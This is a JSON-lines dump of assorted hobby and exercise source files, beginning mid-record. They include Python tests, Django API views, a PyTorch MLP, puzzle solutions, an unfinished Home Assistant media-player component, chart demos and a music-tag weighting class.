web.json_response(\n {\n 'users': [\n {\n 'current_status': 'online',\n 'time_spent_in_status': 60,\n 'login': 'user_1',\n 'lines': ['first', 'second'],\n },\n {\n 'current_status': 'offline',\n 'time_spent_in_status': 120,\n 'login': 'user_2',\n 'lines': ['new'],\n },\n ],\n },\n )\n\n params_to_send = {}\n for key, value in params.items():\n if isinstance(value, list):\n value = '|'.join(value)\n params_to_send[key] = value\n response = await web_app_client.get(\n '/v1/chatterbox/users/stat', params=params_to_send,\n )\n data = await response.json()\n\n assert data == {\n 'users': [\n {\n 'current_status': 'online',\n 'time_spent_in_status': 60,\n 'login': 'user_1',\n 'lines': ['first', 'second'],\n },\n {\n 'current_status': 'offline',\n 'time_spent_in_status': 120,\n 'login': 'user_2',\n 'lines': ['new'],\n },\n ],\n }\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_support_metrics/web/test_get_users_stat.py","file_name":"test_get_users_stat.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73871887890","text":"with open(\"input.txt\") as f:\n count = 0\n for line in f.readlines():\n line = line[:-1]\n vals = line.split(\",\")\n a = vals[0].split(\"-\")\n b = vals[1].split(\"-\")\n\n alo = int(a[0])\n ahi = int(a[1])\n\n blo = int(b[0])\n bhi = int(b[1])\n\n # a\n if (alo <= blo and ahi >= bhi) or (blo <= alo and bhi >= ahi):\n count += 1\n\n # b\n # if not (ahi < blo or bhi < alo):\n # count += 1\n\n print(count)\n","repo_name":"david-j-xu/2022-Advent-of-Code","sub_path":"04/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37236076437","text":"from leads.models import Lead,Suggestion,List,Favorite\nfrom leads.serializers import LeadSerializer,SuggestionSerializer,ListSerializer,FavoriteSerializer,AddFavoriteSerializer,MyFavoriteSerializer\nfrom rest_framework import generics\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse, JsonResponse\nfrom rest_framework.parsers import JSONParser\nfrom leads.scrape import get_data\n\n\nclass LeadListCreate(generics.ListCreateAPIView):\n queryset = Lead.objects.all()\n serializer_class = LeadSerializer \n\nclass SuggestionListCreate(generics.ListCreateAPIView):\n queryset = Suggestion.objects.all()\n serializer_class = SuggestionSerializer \n\nclass ListListCreate(generics.ListCreateAPIView):\n queryset = List.objects.all()\n serializer_class = ListSerializer \n\nclass FavoriteListCreate(generics.ListCreateAPIView):\n queryset = Favorite.objects.all()\n serializer_class = FavoriteSerializer \n\nclass SuggestionGet(generics.RetrieveAPIView):\n queryset = Suggestion.objects.all()\n serializer_class = SuggestionSerializer \n\n# class FavoriteGet(generics.RetrieveAPIView):\n# queryset = Favorite.objects.all()\n# serializer_class = FavoriteSerializer \n\n\n@csrf_exempt\ndef my_favorites(request):\n if not request.user.is_authenticated:\n return JsonResponse(status=403)\n\n if request.method == 'GET':\n #id = request.user.id\n favorites = Favorite.objects.filter(author__exact=request.user)\n serializer = MyFavoriteSerializer(favorites, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n@csrf_exempt\ndef add_favorite(request):\n if not request.user.is_authenticated:\n auth=dict()\n auth['message']='No authentification'\n return JsonResponse(auth, status=403)\n\n if request.method == 'POST':\n data = JSONParser().parse(request)\n data['author'] = request.user.id\n data['list'] = '1'\n #TODO: now always first list, later need to think which id to take\n # data['list_id'] = '1' #List.objects.get(pk=1).id\n serializer = FavoriteSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n\n@csrf_exempt\ndef is_auth(request):\n auth_data = dict()\n if request.user.is_authenticated:\n auth_data['auth'] = True\n user_data = dict()\n user_data['username']=request.user.username\n auth_data['user'] = user_data\n else:\n auth_data['auth'] = False\n return JsonResponse(auth_data, status=200)\n\n@csrf_exempt\ndef add_suggestion(request):\n if not request.user.is_authenticated:\n return JsonResponse(status=401)\n\n if request.method == 'POST':\n data = JSONParser().parse(request)\n data['author'] = request.user.id\n\n webpage_data = get_data(data['link'])\n if webpage_data['title']:\n data['title'] = webpage_data['title']\n\n if webpage_data['description']:\n dots_mark = '..'\n if len(webpage_data['description']) < 295:\n dots_mark = ''\n data['description'] = webpage_data['description'][:295] + dots_mark \n else:\n data['description'] = webpage_data['title']\n\n if webpage_data['keywords']:\n data['keywords'] = webpage_data['keywords'][:295]\n \n\n #TODO: get image from webpage\n if webpage_data['type']=='youtube':\n #get image\n data['image']=data['link']\n else:\n data['image']=data['link']\n\n\n #TODO: add to model: keywords and author (just to see who is using it)\n #get data from POST request\n #get data from webpage, if it exists, if there is some data etc\n # save the suggestion\n # save the same suggestion to users favorites\n\n # import pdb;pdb.set_trace()\n serializer = SuggestionSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n","repo_name":"arvis/langlearn","sub_path":"project/leads/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30130750934","text":"import torch\nfrom torch import nn \nfrom torch.nn import init\nimport numpy as np\nimport sys\nsys.path.append(\"..\") \nimport d2lzh_pytorch as d2l\n#构建网络\nnum_inputs, num_outputs, num_hiddens = 784, 10, 256\nnet = nn.Sequential(\n d2l.FlattenLayer(),\n nn.Linear(num_inputs,num_hiddens),\n nn.ReLU(),\n nn.Linear(num_hiddens,num_outputs)\n)\n#初始化参数\nfor params in net.parameters():\n init.normal_(params,mean=0,std=0.01)\n#定义损失函数\nloss = nn.CrossEntropyLoss()#分开定义softmax运算和交叉熵损失函数可能会造成数值不稳定,pytorch提供了包括softmax运算和交叉熵损失计算的函数\n#定义优化器\noptimizer = torch.optim.SGD(net.parameters(), lr=0.5)\n#读取数据\nbatch_size = 256\ntrain_iter, test_iter = d2l.load_data_fashion_mnist(batch_size)\n#训练模型\nnum_epochs = 5\nd2l.train_ch3(net, train_iter, test_iter, loss, num_epochs, batch_size, None, None, optimizer)","repo_name":"zhangsx19/pytorch-exercise","sub_path":"MLPpytorch实现.py","file_name":"MLPpytorch实现.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41073512218","text":"from typing import List\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def inorderTraversal(self, root: TreeNode) -> List[int]:\n if root == None:\n return []\n if root.left == None and root.right == None:\n return [root.val]\n ret = []\n if root.left:\n ret.extend(self.inorderTraversal(root.left))\n ret.append(root.val)\n if root.right:\n ret.extend(self.inorderTraversal(root.right))\n return ret\n\n","repo_name":"felixchr/leetcode","sub_path":"p0094_binary_tree_inorder_travesal.py","file_name":"p0094_binary_tree_inorder_travesal.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74422224849","text":"\"\"\"\nSupport for interface with a AnthemAV Receiver.\n\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/media_player/\n\"\"\"\nimport logging\nimport socket\nimport select\nimport time\nimport re\nimport voluptuous as vol\n\n\nfrom homeassistant.components.media_player import (\n SUPPORT_TURN_OFF, SUPPORT_VOLUME_MUTE, SUPPORT_VOLUME_SET,\n SUPPORT_SELECT_SOURCE, SUPPORT_VOLUME_STEP, MediaPlayerDevice,\n PLATFORM_SCHEMA)\nfrom homeassistant.const import (\n CONF_HOST, CONF_NAME, STATE_OFF, STATE_ON, STATE_UNKNOWN, CONF_PORT)\nimport homeassistant.helpers.config_validation as cv\n\n_LOGGER = logging.getLogger(__name__)\n\nDEFAULT_NAME = 'AnthemAV'\nDEFAULT_MRXZONE = 1\nCONF_MRXZONE = \"mrxzone\"\nCONF_MINVOL = \"minvol\"\nCONF_MAXVOL = \"maxvol\"\nDEFAULT_MINVOL = -60\nDEFAULT_MAXVOL = -30\n# CONF_TIMEOUT = \"timeout\"\n# CONF_BUFFER_SIZE = \"buffer_size\"\n# DEFAULT_TIMEOUT = 10\n# DEFAULT_BUFFER_SIZE = 1024\n# mrx_payload = \"payload\"\nCONF_MRXMODEL = \"mrxmodel\"\nDEFAULT_MRXMODEL = \"x00\"\n\nSUPPORT_ANTHEMMRX = SUPPORT_SELECT_SOURCE | SUPPORT_VOLUME_STEP | \\\n SUPPORT_VOLUME_SET | SUPPORT_VOLUME_MUTE | SUPPORT_TURN_OFF\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Required(CONF_HOST): cv.string,\n vol.Required(CONF_PORT): cv.port,\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n vol.Optional(CONF_MRXMODEL, default=DEFAULT_MRXMODEL): cv.string,\n vol.Optional(CONF_MRXZONE, default=DEFAULT_MRXZONE): cv.positive_int,\n vol.Optional(CONF_MINVOL, default=DEFAULT_MINVOL): vol.Coerce(float),\n vol.Optional(CONF_MAXVOL, default=DEFAULT_MAXVOL): vol.Coerce(float),\n # vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,\n})\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Setup the AnthemAV platform.\"\"\"\n add_devices([AnthemAV(hass, config)])\n return True\n\n\nclass AnthemAV(MediaPlayerDevice):\n \"\"\"Representation of a AnthemAV Receiver.\"\"\"\n\n def __init__(self, hass, config):\n \"\"\"Initialize the AnthemAV device.\"\"\"\n\n self._name = config.get(CONF_NAME)\n self._muted = None\n self._volume = 0\n self._state = STATE_UNKNOWN\n self._response = None\n self._lastupdatetime = None\n self._selected_source = ''\n self._source_name_to_number = {v: k for k,\n v in mrx_sources.items()}\n self._source_number_to_name = mrx_sources\n self._config = {\n CONF_NAME: config.get(CONF_NAME),\n CONF_HOST: config[CONF_HOST],\n CONF_PORT: config[CONF_PORT],\n CONF_MRXZONE: config.get(CONF_MRXZONE, DEFAULT_MRXZONE),\n CONF_MINVOL: config.get(CONF_MINVOL, DEFAULT_MINVOL),\n CONF_MAXVOL: config.get(CONF_MAXVOL, DEFAULT_MAXVOL),\n CONF_TIMEOUT: config.get(CONF_TIMEOUT, DEFAULT_TIMEOUT),\n CONF_BUFFER_SIZE: config.get(\n CONF_BUFFER_SIZE, DEFAULT_BUFFER_SIZE),\n }\n self.update()\n\n def update(self):\n \"\"\"Retrieve the latest data.\"\"\"\n\n @property\n def source(self):\n \"\"\"Return the current input source.\"\"\"\n return self._selected_source\n\n @property\n def source_list(self):\n \"\"\"List of available input sources.\"\"\"\n return list(self._source_name_to_number.keys())\n\n def select_source(self, source):\n \"\"\"Select input source.\"\"\"\n _LOGGER.info(\"Select Source: %s\",\n self._source_name_to_number.get(source))\n\n @property\n def name(self):\n \"\"\"Return the name of the device.\"\"\"\n return self._name\n\n @property\n def state(self):\n \"\"\"Return the state of the device.\"\"\"\n return self._state\n\n @property\n def volume_level(self):\n \"\"\"Volume level of the media player (0..1).\"\"\"\n return self._volume\n\n @property\n def is_volume_muted(self):\n \"\"\"Boolean if volume is currently muted.\"\"\"\n return self._muted\n\n @property\n def supported_media_commands(self):\n \"\"\"Flag of media commands that are supported.\"\"\"\n return SUPPORT_ANTHEMMRX\n\n def turn_off(self):\n \"\"\"Turn off media player.\"\"\"\n\n def turn_on(self):\n \"\"\"Turn off media player.\"\"\"\n\n def volume_up(self):\n \"\"\"Volume up the media player.\"\"\"\n\n def volume_down(self):\n \"\"\"Volume down media player.\"\"\"\n\n def mute_volume(self, mute):\n \"\"\"Send mute command.\"\"\"\n\n def set_volume_level(self, volume):\n \"\"\"Set volume level, range 0..1.\"\"\"\n mrxvol = int(((self._config[CONF_MAXVOL]\n - self._config[CONF_MINVOL])\n * volume) - (0 - self._config[CONF_MINVOL]))\n\n\n\n# new class for mrx control\n\n # object for each model type with commands and regex\n # volume_up\n # volume_down\n # volume_set\n # volume_get\n # power_on\n # power_off\n # power_get\n # mute_on\n # mute_off\n # mute_toggle\n # mute_get\n # source_set\n # source_get\n\n# Use regex with named groups\n# >>> m = re.match(r\"(?P\\w+) (?P\\w+)\", \"Malcolm Reynolds\")\n# >>> m.group('first_name')\n# 'Malcolm'\n# >>> m.group('last_name')\n# 'Reynolds'\n# combine dictionary\n\n# Use format tags\n\n# use server client method like squeezebox to limit polling of mrx\n\n # # initialise mrx:\n # mrx.initialise(host, port, model)\n # mrx.initialise(192.168.2.200, 4998, 'x00')\n # models: x00, x10, x20\n\n # # store mrx response in object:\n # mrx.state.[zone].[state]\n # mrx.state.[1].volume = -60\n # mrx.state.[1].mute = 0\n # mrx.state.[1].source = 3\n # mrx.state.[1].power = 1\n # store timestamp of last received command\n\n # # commands:\n # mrx.[command](zone, value)\n # mrx.setvolume(1, -60)\n # mrx.setsource(1, 1), use source numbers\n # mrx.setmute(1, 0), options 0, 1, T\n # mrx.setpower(1, 1), options 0, 1\n\n # # Update:\n # mrx.update()\n # optional: limit to 5 seconds since last complete set of information\n\n # # Socket connection:\n # Current: open, send, receive, close every command.\n # optional: open socket connection and watch all responses.\n","repo_name":"tinglis1/anthemav","sub_path":"_HA Component/anthemav.py","file_name":"anthemav.py","file_ext":"py","file_size_in_byte":6277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73424511249","text":"#2048(Easy)\n'''\ndfs()함수 다시 이해해보기\ndfs 알고리즘 공부 필요!!\n재귀함수 너무 어렵다..\n'''\nimport sys,copy\n\ndef move(direction):\n if direction==0: #위쪽 방향으로 이동\n for j in range(n):\n idx=0 #0행부터 차례대로 검사하기 위한 변수\n for i in range(1,n):\n if board[i][j]: #0이 아니라면\n temp=board[i][j] #temp에 값 일시 저장\n board[i][j]=0 #블럭이 옮겨졌다고 생각하고 0으로 수정\n if board[idx][j]==0: #위쪽이 비어있으면\n board[idx][j]=temp #저장한 temp값을 위쪽으로 옮김\n elif board[idx][j]==temp: #저장한 값과 위쪽에 있는 값이 같으면\n board[idx][j]=temp*2 #블록 합침\n idx+=1 #그 다음 행을 탐색하기 위해서\n else: #위쪽이 비어있지도, 같은 블럭도 아니라면\n idx+=1 #그 위에 블럭을 쌓아야 하기 때문에 idx먼저 증가 시킨 후\n board[idx][j]=temp #임시저장한 값을 그대로 다시 보드에 넣음\n\n elif direction == 1: #아래로 이동\n for j in range(n):\n idx = n - 1 #보드의 맨 아래 행\n for i in range(n - 2, -1, -1):\n if board[i][j]: #옮길 블럭이 있다면\n temp = board[i][j] #temp에 값 일시 저장 후\n board[i][j] = 0 #블럭을 옮겼다 치고 0으로 수정\n if board[idx][j] == 0: #비어있다면\n board[idx][j] = temp #임시저장한 값 넣음 (아래로 이동)\n elif board[idx][j] == temp: #옮길 값(temp)와 아래에 있는 블럭이 같다면\n board[idx][j] = temp * 2 #블럭 합침\n idx -= 1 #블럭이 쌓임\n else:\n idx -= 1\n board[idx][j] = temp\n\n elif direction == 2: #왼쪽으로 이동\n for i in range(n):\n idx = 0 #열을 나타 냄\n for j in range(1, n):\n if board[i][j]:\n temp = board[i][j]\n board[i][j] = 0\n if board[i][idx] == 0:\n board[i][idx] = temp\n elif board[i][idx] == temp:\n board[i][idx] = temp * 2\n idx += 1\n else:\n idx += 1\n board[i][idx] = temp\n\n else: #오른쪽으로 이동\n for i in range(n):\n idx = n - 1\n for j in range(n - 2, -1, -1):\n if board[i][j]:\n temp = board[i][j]\n board[i][j] = 0\n if board[i][idx] == 0:\n board[i][idx] = temp\n elif board[i][idx] == temp:\n board[i][idx] = temp * 2\n idx -= 1\n else:\n idx -= 1\n board[i][idx] = temp\n\ndef dfs(count):\n global maxBlock,board\n if count==5: #최대 5번 움직였다면 멈추고 전체 배열의 최대 값을 반환\n for i in range(n):\n for j in range(n):\n maxBlock=max(maxBlock,board[i][j])\n return\n copyBoard=copy.deepcopy(board) #이동 전 보드의 상태 저장\n for i in range(4):\n move(i) #move()함수로 이동 뒤\n dfs(count+1) #재귀적으로 호출\n board=copy.deepcopy(copyBoard)\n\nn=int(sys.stdin.readline())\nboard=[]\nfor i in range(n):\n board.append(list(map(int,sys.stdin.readline().split())))\nmaxBlock=0\ndfs(0)\nprint(maxBlock)","repo_name":"dbswl4951/baekjoon_algorithm","sub_path":"backjoon_algorithm/implementation/ex12100.py","file_name":"ex12100.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16682343267","text":"#!/usr/bin/python3\n\"\"\"This script will check utf-8 validity\"\"\"\n\n\ndef validUTF8(data):\n \"\"\"This script will return true if given list is a valid UTF-8\"\"\"\n num_bytes = 0\n for i in range(len(data)):\n bits = format(data[i], '#010b')[-8:]\n if bits[0] == '0':\n continue\n else:\n for bit in bits:\n if bit != '0':\n num_bytes += 1\n else:\n break\n if num_bytes == 1 or num_bytes >= 5:\n return False\n if (num_bytes > 1 and num_bytes <= 4):\n after_byte = i + 1\n last_byte = i + num_bytes\n if (after_byte > len(data) or last_byte > len(data)):\n return False\n for j in range(after_byte, last_byte):\n new_bits = format(data[j], '#010b')[-8:]\n if not (new_bits[0] == '1' and new_bits[1] == '0'):\n return False\n else:\n continue\n return True\n return True\n","repo_name":"samie-ya/alx-interview","sub_path":"0x04-utf8_validation/0-validate_utf8.py","file_name":"0-validate_utf8.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42911449339","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\n# Include the `fusioncharts.py` file which has required functions to embed the charts in html page\nfrom fusioncharts import FusionCharts\n\n# Loading Data from a Static JSON String\n# It is a example to show a MsCombi 2D chart where data is passed as object.\n# The `chart` method is defined to load chart data\ndef chart(request):\n\n datasource = {}\n datasource[\"chart\"] = {\n \"caption\": \"Actual Revenues, Targeted Revenues & Profits\",\n \"subcaption\": \"Last year\",\n \"xaxisname\": \"Month\",\n \"yaxisname\": \"Amount (In USD)\",\n \"numberprefix\": \"$\",\n \"theme\": \"ocean\"\n }\n datasource[\"categories\"] = [{\n \"category\": [\n {\"label\": \"Jan\"},\n {\"label\": \"Feb\"},\n {\"label\": \"Mar\"},\n {\"label\": \"Apr\"},\n {\"label\": \"May\"},\n {\"label\": \"Jun\"},\n {\"label\": \"Jul\"},\n {\"label\": \"Aug\"},\n {\"label\": \"Sep\"},\n {\"label\": \"Oct\"},\n {\"label\": \"Nov\"},\n {\"label\": \"Dec\"}\n ]\n }]\n\n datasource[\"dataset\"] = [{\n \"seriesname\": \"Actual Revenue\",\n \"data\": [\n {\"value\": \"16000\"},\n {\"value\": \"20000\"},\n {\"value\": \"18000\"},\n {\"value\": \"19000\"},\n {\"value\": \"15000\"},\n {\"value\": \"21000\"},\n {\"value\": \"16000\"},\n {\"value\": \"20000\"},\n {\"value\": \"17000\"},\n {\"value\": \"25000\"},\n {\"value\": \"19000\"},\n {\"value\": \"23000\"}\n ]\n }, {\n \"seriesname\": \"Projected Revenue\",\n \"renderas\": \"line\",\n \"showvalues\": \"0\",\n \"data\": [\n {\"value\": \"15000\"},\n {\"value\": \"16000\"},\n {\"value\": \"17000\"},\n {\"value\": \"18000\"},\n {\"value\": \"19000\"},\n {\"value\": \"19000\"},\n {\"value\": \"19000\"},\n {\"value\": \"19000\"},\n {\"value\": \"20000\"},\n {\"value\": \"21000\"},\n {\"value\": \"22000\"},\n {\"value\": \"23000\"}\n ]\n }, {\n \"seriesname\": \"Profit\",\n \"renderas\": \"area\",\n \"showvalues\": \"0\",\n \"data\": [\n {\"value\": \"4000\"},\n {\"value\": \"5000\"},\n {\"value\": \"3000\"},\n {\"value\": \"4000\"},\n {\"value\": \"1000\"},\n {\"value\": \"7000\"},\n {\"value\": \"1000\"},\n {\"value\": \"4000\"},\n {\"value\": \"1000\"},\n {\"value\": \"8000\"},\n {\"value\": \"2000\"},\n {\"value\": \"7000\"}\n ]\n }\n ]\n\n # Create an object for the mscombi2d chart using the FusionCharts class constructor\n mscombi2dChart = FusionCharts(\"mscombi2d\", \"ex1\", \"100%\", 400, \"chart-1\", \"json\", datasource)\n # returning complete JavaScript and HTML code, which is used to generate chart in the browsers. \n pyramidChart = FusionCharts(\"pyramid\", \"ex2\", \"70%\", \"385\", \"chart-2\", \"json\", \n \"\"\"{\n \"chart\": {\n \"bgcolor\": \"FFFFFF\",\n \"caption\": \"Revenue distribution for 2017\",\n \"basefontcolor\": \"333333\",\n \"decimals\": \"0\",\n \"numbersuffix\": \"M\",\n \"numberprefix\": \"$\",\n \"pyramidyscale\": \"40\",\n \"chartbottommargin\": \"0\",\n \"captionpadding\": \"0\",\n \"showborder\": \"0\"\n },\n \"data\": [\n {\n \"value\": \"17\",\n \"name\": \"Products\",\n \"color\": \"008ee4\"\n },\n {\n \"value\": \"21\",\n \"name\": \"Services\",\n \"color\": \"6baa01\"\n },\n {\n \"value\": \"20\",\n \"name\": \"Consultancy\",\n \"color\": \"f8bd19\"\n },\n {\n \"value\": \"5\",\n \"name\": \"Others\",\n \"color\": \"e44a00\"\n }\n ]\n }\"\"\")\n\n # Create an object for the funnel chart using the FusionCharts class constructor\n funnelChart = FusionCharts(\"funnel\", \"ex3\", \"70%\", \"385\", \"chart-3\", \"json\", \n \"\"\"{\n \"chart\": {\n \"bgcolor\": \"FFFFFF\",\n \"caption\": \"Conversion - 2017\",\n \"decimals\": \"1\",\n \"basefontsize\": \"11\",\n \"issliced\": \"0\",\n \"ishollow\": \"1\",\n \"labeldistance\": \"8\",\n \"showBorder\": \"0\"\n },\n \"data\": [\n {\n \"label\": \"Website Visits\",\n \"value\": \"385634\"\n },\n {\n \"label\": \"Downloads\",\n \"value\": \"145631\",\n \"color\": \"008ee4\"\n },\n {\n \"label\": \"Interested to Participate\",\n \"value\": \"84564\",\n \"color\": \"f8bd19\"\n },\n {\n \"label\": \"Contracts finalized\",\n \"value\": \"50654\",\n \"color\": \"6baa01\"\n },\n {\n \"label\": \"Adquired\",\n \"value\": \"25342\",\n \"color\": \"e44a00\"\n }\n ]\n }\"\"\")\n\n pie3d = FusionCharts(\"pie3d\", \"ex4\" , \"80%\", \"400\", \"chart-4\", \"json\", \n # The data is passed as a string in the `dataSource` as parameter.\n \"\"\"{ \n \"chart\": {\n \"caption\": \"Age profile of website visitors\",\n \"subcaption\": \"Last Year\",\n \"startingangle\": \"120\",\n \"showlabels\": \"0\",\n \"showlegend\": \"1\",\n \"enablemultislicing\": \"0\",\n \"slicingdistance\": \"15\",\n \"showpercentvalues\": \"1\",\n \"showpercentintooltip\": \"0\",\n \"plottooltext\": \"Age group : $label Total visit : $datavalue\",\n \"theme\": \"ocean\"\n },\n \"data\": [\n {\"label\": \"Teenage\", \"value\": \"1250400\"},\n {\"label\": \"Adult\", \"value\": \"1463300\"},\n {\"label\": \"Mid-age\", \"value\": \"1050700\"},\n {\"label\": \"Senior\", \"value\": \"491000\"}\n ]\n }\"\"\")\n # returning complete JavaScript and HTML code, which is used to generate chart in the browsers. \n return render(request, 'index.html', {'mscombi2dChart' : mscombi2dChart.render(), 'pyramidChart' : pyramidChart.render(),\n 'funnelChart' : funnelChart.render(), 'pie3d': pie3d.render()})","repo_name":"Brunux/subscriber-backend","sub_path":"analytics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39729302943","text":"import cv2\nimport math\n\n\n\ncap = cv2.VideoCapture(r\"F:\\计算机设计大赛\\计设数据集\\最终数据集视频\\2023_4_19_成功1.avi\")\nframeRate = cap.get(5) # frame rate\nif not cap.isOpened():\n print('error')\n exit(-1)\nwhile (cap.isOpened()):\n frameId = cap.get(1) # current frame number\n ret, frame = cap.read()\n if (ret != True):\n break\n if frameId % math.floor(frameRate) == 0:\n filename = '../Dataset/oriData/image_2_' + str(int(frameId)) + \".png\"\n try:\n cv2.imwrite(filename, frame)\n except:\n print('error occur, maybe img folder not exist')\ncap.release()\nprint (\"Done!\")","repo_name":"tsieyy/data_augmentation","sub_path":"tools/avi2jpg.py","file_name":"avi2jpg.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39534498596","text":"import random, sys, copy\nfrom src.Camera import Camera\n\n\nclass State:\n def __init__(self, problem, cameras=None):\n self.problem = problem\n self.cameras = []\n self.cameras = cameras if cameras is not None else self.generateCameras()\n self.energy = sys.maxsize\n self.coverage_energy = None\n self.camera_cost = None\n self.redundancy_cost = None\n\n def getRandomFreePointFromRoom(self):\n free_points = self.getFreePoints()\n if not free_points:\n error = \"Exception in State.getRandomFreePointFromRoom: no points left!\"\n raise RuntimeError(error)\n else:\n return random.choice(free_points)\n\n def getFreePoints(self):\n def isCameraPos(cls, pos):\n for c in cls.cameras:\n if c.x == pos[0] and c.y == pos[1]:\n return True\n return False\n\n return list(filter(lambda p: not isCameraPos(self, p), self.problem.inside_points))\n\n def generateCameras(self):\n cameras = []\n for _ in range(self.problem.min_number_of_cams):\n cameras.append(Camera(self.problem, self.getRandomFreePointFromRoom()))\n\n return cameras\n\n def generateNeighbour(self, camera_move_method):\n # deep copy cameras\n cameras = [copy.copy(c) for c in self.cameras]\n\n transformation = self.randomlyChooseTransformationMethod(cameras)\n\n # perform transformation\n if transformation == 'insert':\n new_camera = Camera(self.problem, self.getRandomFreePointFromRoom())\n cameras.append(new_camera)\n elif transformation == 'remove':\n cameras.remove(random.choice(self.cameras))\n elif transformation == 'move':\n to_modify = random.choice(self.cameras)\n if camera_move_method == 'local':\n to_modify.move()\n elif camera_move_method == 'random':\n to_modify.move(self.getRandomFreePointFromRoom())\n else:\n raise RuntimeError(\"Wrong move camera method!\")\n else:\n raise RuntimeError(\"Wrong transformation method!\")\n\n return State(self.problem, cameras)\n\n def randomlyChooseTransformationMethod(self, cameras):\n free_points = self.getFreePoints()\n choices = set()\n\n if len(cameras) <= 1:\n choices.add('insert')\n else:\n choices.add('remove')\n if len(free_points) > 0:\n choices.update({'insert', 'move'})\n return random.choice(tuple(choices))\n","repo_name":"wfranus/cameras","sub_path":"src/State.py","file_name":"State.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"29988229208","text":"import math\n\nfrom Artist import Artist\nfrom ArtistTags import ArtistTags\nfrom TagArtistWeights import TagArtistWeights\n\nclass ArtistWeightCalc:\n \"\"\"\n Calculates the weights of artists to tags they have been assigned to.\n\n For instance, artists tagged only as \"funk\" are weighted higher than\n artists tagged partially as \"funk\".\n \"\"\"\n\n def __init__(self):\n # Tags used fewer times will be excluded from the graph\n self._minTagCount = 0\n\n # Map from artistId to artist object\n # Ensures uniqueness of Artist objects to save memory\n self._artists = {}\n\n # Stores the relationship between artists and tags\n self._artistTags = ArtistTags()\n\n def setMinTagCount(self, minTagCount):\n self._minTagCount = minTagCount\n\n def add(self, artistId, artistName, tag, tagCount):\n artistId = artistId.lower()\n artistName = artistName.lower()\n tag = tag.lower()\n\n # Get the artist. O(1) on average\n artist = None\n if artistId in self._artists:\n artist = self._artists[artistId]\n else:\n artist = Artist(artistId, artistName)\n self._artists[artistId] = artist\n \n self._artistTags.add(artist, tag, tagCount)\n\n return artist\n\n def pruneTags(self):\n tagsToRemove = []\n\n for tag in self._artistTags.getTags():\n if not self._acceptTag(tag):\n tagsToRemove.append(tag)\n\n for tag in tagsToRemove:\n artistsWithNoTags = self._artistTags.remove(tag)\n\n for artist in artistsWithNoTags:\n del self._artists[artist.getId()]\n\n def getTagToArtistsWeights(self):\n # Dictionary from tag to (Artist, weight)\n tagArtistWeights = TagArtistWeights()\n\n totalTagCount = self._artistTags.getTagCount() \n\n for tag in self._artistTags.getTags():\n currentTagCount = self._artistTags.getTotalTagCount(tag)\n\n for artist in self._artistTags.getArtistsWithTag(tag):\n artistTagCount = self._artistTags.getTagCountOfArtist(tag, artist)\n # Number of times the artist appears for the tag / number of artist songs for tag\n tf = artistTagCount / currentTagCount\n # loge(number of tags / number of tags with artist)\n idf = math.log(totalTagCount / self._artistTags.getArtistTagCount(artist))\n\n #print('For Artist %s with tag %s' %(artist.getName(), tag))\n #print(' tf = %d / %d = %.3f' %(artistTagCount, currentTagCount, tf))\n #print(' idf = log(%d / %d) = %.3f' %(totalTagCount, self._artistTags.getArtistTagCount(artist), idf))\n #print(' tf*idf = %.3f' %(tf * idf))\n\n tfidf = tf * idf\n\n tagArtistWeights.add(tag, artist, tfidf)\n\n return tagArtistWeights\n\n def _acceptTag(self, tag):\n \"\"\" Flags to disregard tags which are only used once. \"\"\"\n return len(self._artistTags.getArtistsWithTag(tag)) >= self._minTagCount\n\n def getArtistTags(self):\n return self._artistTags\n\n def getArtists(self):\n return self._artists\n\n def getStatsString(self):\n return 'Stats: #artists: %d, #tags: %d' % (len(self._artists), self._artistTags.getTagCount())\n\n","repo_name":"FahmiA/MatchThatGenre","sub_path":"TagGraphGenerator/ArtistWeightCalc.py","file_name":"ArtistWeightCalc.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} 